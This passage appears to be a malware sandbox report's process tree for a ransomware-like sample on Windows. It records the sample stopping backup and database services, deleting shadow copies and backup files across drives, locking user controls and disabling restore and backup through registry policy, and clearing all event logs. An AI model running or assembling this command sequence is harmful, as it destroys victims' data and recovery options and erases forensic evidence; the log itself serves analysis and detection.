net stop BMR Boot Service /y
3⤵
PID:2832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
4⤵
PID:4456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
2⤵
PID:3260

C:\Windows\system32\net.exe
net stop NetBackup BMR MTFTP Service /y
3⤵
PID:2024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
4⤵
PID:1392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
2⤵
PID:3816

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY start=disabled
3⤵
- Launches sc.exe
PID:4548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:5008

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
- Launches sc.exe
PID:2300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
2⤵
PID:3920

C:\Windows\system32\sc.exe
sc config SQLWriter start= disabled
3⤵
- Launches sc.exe
PID:2524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
2⤵
PID:3896

C:\Windows\system32\sc.exe
sc config SstpSvc start= disabled
3⤵
- Launches sc.exe
PID:4076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
2⤵
PID:4952

C:\Windows\system32\taskkill.exe
taskkill /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
2⤵
PID:4132

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
2⤵
PID:2116

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:1584

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
2⤵
PID:1708

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:2328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2⤵
PID:1960

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:3540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
2⤵
PID:4672

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
2⤵
PID:4632

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
2⤵
PID:1136

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
2⤵
PID:3792

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
2⤵
PID:5112

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
2⤵
PID:3412

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
2⤵
PID:3152

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
2⤵
PID:3508

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
2⤵
PID:1748

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
2⤵
PID:4640

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:4488

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win
2⤵
PID:2372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win
2⤵
PID:4972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win
2⤵
PID:4120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win
2⤵
PID:3564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win
2⤵
PID:4248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win
2⤵
PID:3448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del %0
2⤵
PID:1300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2
2⤵
PID:3212

C:\Windows\system32\attrib.exe
attrib +h +s hrmlog2
3⤵
- Views/modifies file attributes
PID:2980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2
2⤵
PID:4044

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\hrmlog2
3⤵
- Views/modifies file attributes
PID:3756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:280

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:4660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
2⤵
PID:2100

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
3⤵
PID:3552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
2⤵
PID:4728

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
3⤵
PID:4104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
2⤵
PID:5116

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
3⤵
PID:3824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:2800

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:3176

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:3828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:816

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:4628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
2⤵
PID:376

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
3⤵
PID:4164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
2⤵
PID:1852

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
3⤵
PID:2964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
2⤵
PID:1128

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
3⤵
PID:4908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:1652

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:4800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:2460

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:5036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
2⤵
PID:4468

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
3⤵
PID:716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
2⤵
PID:696

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:4856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
2⤵
PID:4416

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
3⤵
PID:3204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:1856

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
3⤵
PID:4228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:3088

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:4400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:2328

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:1708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:3280

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:4532

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:4732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:2544

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
2⤵
PID:3932

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
3⤵
PID:2984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
2⤵
PID:756

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
3⤵
PID:3296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:3236

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:4000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:3432

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:1680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
2⤵
PID:1492

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
3⤵
PID:5112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:2128

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:2624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:4148

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:2448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:1904

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:2268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
2⤵
PID:1552

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
3⤵
PID:4372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
2⤵
PID:3496

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:4304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
2⤵
PID:1748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
3⤵
PID:784

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "AMSI/Debug"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "AirSpaceChannel"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Application"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4120

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
3⤵
PID:2588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "FirstUXPerf-Analytic"
3⤵
- Clears Windows event logs
PID:3840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
3⤵
PID:4204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "General Logging"
3⤵
PID:4848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "IHM_DebugChannel"
3⤵
PID:2284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
3⤵
- Clears Windows event logs
PID:3832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
3⤵
PID:3860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
3⤵
PID:280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
3⤵
PID:628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
3⤵
PID:4660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
3⤵
PID:3552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
3⤵
PID:2100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Key Management Service"
3⤵
- Clears Windows event logs
PID:4104

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceMFT"
3⤵
PID:4728

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationFrameServer"
3⤵
- Clears Windows event logs
PID:2132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProc"
3⤵
PID:3436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProcD3D"
3⤵
PID:3484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationAsyncWrapper"
3⤵
PID:4312

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationContentProtection"
3⤵
PID:1684

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDS"
3⤵
- Clears Windows event logs
PID:4628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
3⤵
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationMP4"
3⤵
- Clears Windows event logs
PID:4164

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationMediaEngine"
3⤵
PID:376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
3⤵
PID:2964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformanceCore"
3⤵
PID:1852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
3⤵
PID:4908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
3⤵
PID:1128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationSrcPrefetch"
3⤵
- Clears Windows event logs
PID:4076

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
3⤵
- Clears Windows event logs
PID:3668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Admin"
3⤵
PID:4784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Debug"
3⤵
- Clears Windows event logs
PID:4988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Operational"
3⤵
- Clears Windows event logs
PID:4952

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
3⤵
PID:2516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
3⤵
PID:4132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
3⤵
PID:1324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
3⤵
PID:2384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
3⤵
PID:3048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
3⤵
PID:5048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
3⤵
PID:2156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
3⤵
PID:4124

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
3⤵
- Clears Windows event logs
PID:2084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
3⤵
PID:2240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
3⤵
PID:3776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
3⤵
PID:4356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
3⤵
PID:3164

C:\Windows\system32\wevtutil.exe
